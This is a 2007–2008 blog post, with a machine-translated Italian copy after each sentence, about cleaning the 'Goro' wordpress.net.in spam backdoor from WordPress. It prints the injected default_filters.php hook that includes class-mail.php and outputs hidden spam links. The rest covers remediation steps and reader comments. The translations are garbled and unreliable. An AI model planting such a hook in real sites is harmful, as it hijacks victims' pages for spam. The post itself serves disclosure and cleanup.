I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in). Ho trovato questo durante la navigazione WordPress forum di supporto, alcune di queste vittime aggiornare le loro default_filters.php e carica-mail.php classe all'interno del loro WordPress senza essere a conoscenza del fatto che si tratta di una backdoor (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php . Non vi è alcuna classe-mail.php in WordPress, ad eccezione di classe phpmailer.php. So don’t get confuse by it. Quindi non confondere ottenere da essa.
Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes. Qui di seguito è una rapida soluzione su come si può offendere rimosso il Goro spamware prima iniezione di Google è vietato da internet tubi.
Workaround Soluzione
- For temporary disable remote include in php.ini settings. Per disattivare temporaneamente remoto includono impostazioni di php.ini.
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;;; Fopen wrapper; ;;;;;;;;;;;;;;;;;;; se consentire il trattamento di URL (come http:// o ftp://) come file. allow_url_fopen = off allow_url_include = off allow_url_fopen = off allow_url_include = off
- Check your .htaccess for suspicious redirect. Controlla il tuo. Htaccess per sospette reindirizzamento.
- Find class-mail.php inside “*/wp-includes/” directory and removed it. Trova classe-mail.php dentro "* / wp-includes /" directory e rimosso.
- Find the following code inside “*/wp-includes/default_filters.php” and removed it Trova il seguente codice all'interno di "* / wp-includes/default_filters.php" e rimosso
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( 'wp_footer', 'wpc7c16b8466d864eeefd20050625c7775'); funzione wpc7c16 <> b8466d864eeefd20050625c7775 () (@ include ( '. / wp-includes / class-mail.php'); if (sizeof ($ wparr)> 0) (echo " ! div id = \ "Goro \"! "; foreach ($ wparr come $ k => $ v) (echo" ". ucwords ($ v [ 'chiave'])." \ n"; if ($ i = = $ inum) break;) echo "! / div !".$_ piè di pagina;)) Robots.txt Exclusion Esclusione robots.txt
Optional - Prevent googlebot from indexing the static spam page. Opzionale - impedire a Googlebot di indicizzare la pagina statica di spam.
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Login per WordPress Admin> Gestisci> File> Altri File → Digitare "robots.txt". Add the following code. Aggiungere il seguente codice.User-agent: Googlebot Disallow: /*?* Disallow: /*? User-agent: Googlebot Disallow: / *? * Disallow: / *?Refer robots.txt . Fare riferimento robots.txt.
Possible WordPress class (suspicious) files that would be tempered WordPress possibile classe (sospette) file che sarebbe temperato
Md5 checksum the following files, compare it with official versions from WordPress Release Archive . Md5 checksum i seguenti file, confrontarlo con le versioni ufficiali da WordPress Uscita Archivio.
The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Metodi sopra descritti solo disabili e rimuovere il link spam, non vi è alcuna garanzia che esso è protetto dal futuro vulnerabilità. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade . Backup (o esportare il tuo post utilizzando WordPress eXtended RSS-WRX) e di eseguire un aggiornamento completo.
- Dec 13, 2007 Dicembre 13, 2007
I just notice this recently. Ho appena presente Avviso di recente. You’ll need to check your site HTTP Header. Devi controllare il tuo sito HTTP. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) . La maggior parte dei siti web dirottato non corretta risposta con stato HTTP Header (400 <> 500). My guess is they did this to cloak from being crawl by search engine spiders. Indovinare la mia è che ha fatto questo a mantello da eseguire la scansione di spider dei motori di ricerca. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner . Se si ha puliti tutti i file infetti e il tuo header di risposta non correttamente ottenere un rookit scanner.
Check your website status header, try cloak your browser (UA) as Search Engine Crawler. Controlla il tuo sito web status di intestazione, prova il tuo browser mantello (UA) come motore di ricerca spider. The following screenshot will show you how to setup this at web-sniffer.net. Il seguente schermata vi mostrerà come configurare questo a web-sniffer.net.
This methods may not work if the cloaking scripts used IP base tracking. Metodi di questo potrebbe non funzionare se il cloaking script utilizzati IP di base di monitoraggio. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver). Così provare a diversi stringa agente utente (vale a dire: inoktomi, askjeeves, ia_archiver).
Firefox Browser Browser Firefox
You can also override your useragent string with firefox ↓. È anche possibile ignorare il tuo UserAgent stringa con Firefox ↓.
about:config → general.useragent.overide = ‘ ua strings ‘ about: config → general.useragent.overide = 'ua stringhe'
Wordpress.net.in Backdoor Wordpress.net.in Backdoor
Extra info Ulteriori informazioni
Wordpress.net.in Doorway Wordpress.net.in Doorway
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ Dicembre 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Files Backdoor File
inside wp-includes directory. all'interno di wp-include directory.
- compat.php - (replace with latest version) compat.php - (sostituire con versione più recente)
- class-mail.php delete classe-mail.php eliminare
scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins . Scan & backdoor rimuove tutti i file e creare un file. htaccess file all'interno di wp-include & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index). Quindi aggiungere il seguente codice per disabili elenco di directory (prevenire perdite e informazioni Directory indice di ricerca).
Options -Indexes Opzioni-Indici Wordpress.net.in New Partner Wordpress.net.in nuovo partner
Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 23 febbraio 2008, abbiamo trovato una firma simile a come wordpress.net.in qwetro.com (Germania). Probably from the same attacker with different agenda. Probabilmente dallo stesso attaccante con diverse ordine del giorno.
Related Posts Posti connessi
- Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) Bluehost HostMonster CEO's Blog inciso (wordpress.net.in)
- Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II Matt Heaton Bluehost Hostmonster dell'Amministratore Delegato nuovamente inciso - Strike II
External Links Collegamenti esterni
- Websniffer View HTTP Request and Response Header Websniffer vista richiesta HTTP e la risposta header
- Wordpress Support Forum Wordpress forum di supporto
- National Vulnerability Database Wordpress 2.0 > 2.0.6 Vulnerability Database nazionale Wordpress 2,0> 2.0.6
16 Responses to “How to Remove Wordpress.net.in Spam Injection” 16 Risposte a "Come rimuovere il virus Wordpress.net.in Spam"
[...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. [...] Na enak problema, o vendar? Itno jih je zelo malo rešilo tutte skupaj. Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...] Ampak Google dela? Udeže: Come Rimosso Wordpress.net.in Spam infezione da virus' Goro 'Spam classe-mail.php backdoor nel rešitev je [...]
[...] I’ve find some useful information on how to clean that mess on Kakkoi: How to Removed Wordpress.net.in Spam Injection. [...] Ho trovato alcune informazioni utili su come pulire la mensa che a Kakkoi: Come Rimosso Wordpress.net.in Spam di iniezione. [...]
[...] wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Wordpress.net.in rivelato un certo numero di pagine, tra cui una voce del blog di Avice De'vereux quello descritto i sintomi e le ha detto che sono stati causati da una iniezione di spam hijack di [...]
[...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] È ciò che Gordon Seleziona Scoperto: usare Google wordpress.net.in rivelato un certo numero di pagine, tra cui una voce del blog di Avice De'vereux quello descritto i sintomi e le ha detto che sono stati causati da un spam iniezione di dirottare [.. .]
[...] leads me to Avice’s perfectly wonderful life saving post, where she instructs how to remove [...] [...] Mi porta a Avice perfettamente meravigliosa vita di risparmio postale, dove si incarica come rimuovere [...]
[...] en is alle gehackte code gevonden. [...] It è alle gehackte codice gevonden. Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen. Mocht je ultimo hebben van de div id = "Goro" hack Tornando presente eens hier voor handige suggerimenti voor het verwijderen. Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...] Alhoewel ik voorlopig geen PC klusjes zou doen gaan noi toch [...]
I got hacked to, mine was spam links to I got a inciso, è stato il mio link a spam
donaldsensing.com:6666 donaldsensing.com: 6666[...] Related: Blogs Take Center Stage For Marketers And For Google How to Remove Wordpress.net.in Spam Injection [...] [...] Correlati: blogs prendere per il centro della scena e per il marketing di Google come rimuovere lo spam Wordpress.net.in iniezione [...]
I'm not sure who is "alxumuk" real name is, but there is an editor at DMOZ with similar display name. Non sono sicuro che è "alxumuk" vero nome è, ma non vi è un editor a DMOZ simile a nome di visualizzazione.
Lack Resources Mancanza RisorseATM I only have a few raw accesslog from Murray's blog & Jens's blog . Matt Heaton never replies. ATM ho solo poche materie prime accesslog dal blog di Murray & Jens's Blog. Matt Heaton mai risposte.
I hope that Mr. Goro got careless and show his footprint, I need more raw access log. Mi auguro che il signor Goro ha imprudentemente e mostrare la sua impronta, ho bisogno di più crudo di log di accesso. Send it to my email Inviarlo al mio indirizzo email
[...] might go Here to learn the way to remove the Spam [...] [...] Qui potrebbe andare ad imparare il modo di rimuovere il Spam [...]
Co-Founder of Mozilla Project WordPress Blog's Hacked... Blake Ross, the Co-Founder of Mozilla Project WordPress Blog's Hacked by Wordpress.net.in Blackhat Spammer. Co-fondatore del progetto Mozilla WordPress Blog's hacked ... Blake Ross, co-fondatore del progetto Mozilla WordPress Blog's hacked di Wordpress.net.in Blackhat Spammer. ......
[...] het te maken had met spam injection hijack by wordpress.net.in. [...] Het te maken aveva incontrato spam iniezione di dirottare wordpress.net.in. Meer info over het probleem kan je hier vinden. Informazioni su meer het problema je kan hier vinden. De eenvoudigste oplossing voor het probleem, is een nieuwe versie van wordpress erop [...] Eenvoudigste de oplossing voor het problema, è een nieuwe versie van wordpress erop [...]